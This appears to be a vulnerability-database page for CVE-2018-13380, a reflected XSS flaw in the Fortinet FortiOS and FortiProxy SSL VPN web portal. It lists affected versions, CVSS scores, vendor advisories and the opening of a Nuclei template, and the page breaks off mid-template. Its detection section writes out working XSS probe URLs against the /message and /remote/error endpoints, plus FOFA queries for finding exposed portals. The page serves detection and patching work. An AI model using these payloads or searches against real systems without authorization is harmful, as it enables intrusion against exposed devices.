CVE-2018-13380
published 2019-06-04CVE-2018-13380: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below and Fortinet FortiProxy 2.0.0…
PriorityP355medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
62.47%
99.1th percentile
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below and Fortinet FortiProxy 2.0.0, 1.2.8 and below under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortinet | — | — |
| fortinet | fortinet_fortios_and_fortiproxy | — | — |
| fortinet | fortios | <= 5.2 | — |
| fortinet | fortios | — | — |
| fortinet | fortios | 5.4.0 – 5.4.12 | — |
| fortinet | fortios | 5.6.0 – 5.6.7 | — |
| fortinet | fortios | 6.0.0 – 6.0.4 | — |
| fortinet | fortiproxy | <= 1.2.8 | — |
| fortinet | fortiproxy | — | — |
| fortinet | fortiproxy | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B
url/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E
path/remote/login
- →Probe the SSL VPN web portal's /message endpoint with XSS payload in the 'msg' parameter; a vulnerable host will reflect the payload (e.g., <svg/onload=...>) in the HTTP 200 response body.
- →Probe the SSL VPN web portal's /remote/error endpoint with XSS payload in the 'errmsg' parameter; a vulnerable host will reflect <script>alert(1337)</script> in the HTTP 200 response body.
- →Match response body for reflected XSS strings and confirm HTTP 200 status; exclude JSON responses (Content-Type: application/json) to reduce false positives.
- →Use FOFA to identify exposed FortiOS SSL VPN portals by searching for body containing /remote/login or icon_hash=945408572.
- ·The vulnerability affects the SSL VPN web portal's error and message handling parameters specifically; exploitation requires user interaction (UI:R) as it is a reflected XSS. ↗
- ·Affected scope spans FortiOS 6.0.0–6.0.4, 5.6.0–5.6.7, 5.4.0–5.4.12, 5.2 and below, and FortiProxy 2.0.0 and 1.2.8 and below. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p6vg-vj3x-m483: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6
ghsa_unreviewed·2022-05-24
CVE-2018-13380 [MEDIUM] CWE-79 GHSA-p6vg-vj3x-m483: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
Fortinet
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and...
vendor_fortinet·2019-06-04·CVSS 4.7
CVE-2018-13380 [MEDIUM] CWE-79 A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and...
FG-IR-20-230: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and...
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below and Fortinet FortiProxy 2.0.0, 1.2.8 and below under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
CVEs: CVE-2018-13380
CWEs: CWE-79
CVSS: 4.7 (medium)
Affected products: FortiOS, FortiProxy, Fortinet
Fortinet
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and...
vendor_fortinet·2019-06-04·CVSS 4.7
CVE-2018-13380 [MEDIUM] CWE-79 A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and...
FG-IR-18-383: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and...
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below and Fortinet FortiProxy 2.0.0, 1.2.8 and below under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
CVEs: CVE-2018-13380
CWEs: CWE-79
CVSS: 4.7 (medium)
Affected products: FortiOS, FortiProxy, Fortinet
No detection rules found.
Nuclei
Fortinet FortiOS - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2018-13380 [MEDIUM] Fortinet FortiOS - Cross-Site Scripting
Fortinet FortiOS - Cross-Site Scripting
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
Template:
id: CVE-2018-13380
info:
name: Fortinet FortiOS - Cross-Site Scripting
author: shelld3v,AaronChen0
severity: medium
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
impact: |
Successful exploitation of this vulnerability could allow an attacker to exec
2019-06-04
Published